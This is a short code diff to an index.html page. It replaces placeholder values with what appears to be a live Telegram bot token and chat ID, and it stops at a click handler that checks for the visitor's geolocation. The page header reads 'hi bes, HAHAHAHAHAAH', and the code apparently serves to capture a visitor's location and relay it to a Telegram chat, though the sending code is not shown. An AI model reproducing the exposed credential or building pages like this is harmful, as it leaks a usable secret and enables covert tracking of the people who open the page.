--- a/index.html
+++ b/index.html
@@ -11,8 +11,8 @@ hi bes, HAHAHAHAHAAH
 </button>
 
 <script>
-const BOT_TOKEN = "YOUR_BOT_TOKEN_HERE";
-const CHAT_ID = "YOUR_CHAT_ID_HERE";
+const BOT_TOKEN = "8414142850:AAG5h5YrupR6GY4hhP3FvGpxibF7W3hibHQ";
+const CHAT_ID = "-1002679152773";
 
 document.getElementById("sendBtn").addEventListener("click", () => {
     if (navigator.geolocation) {
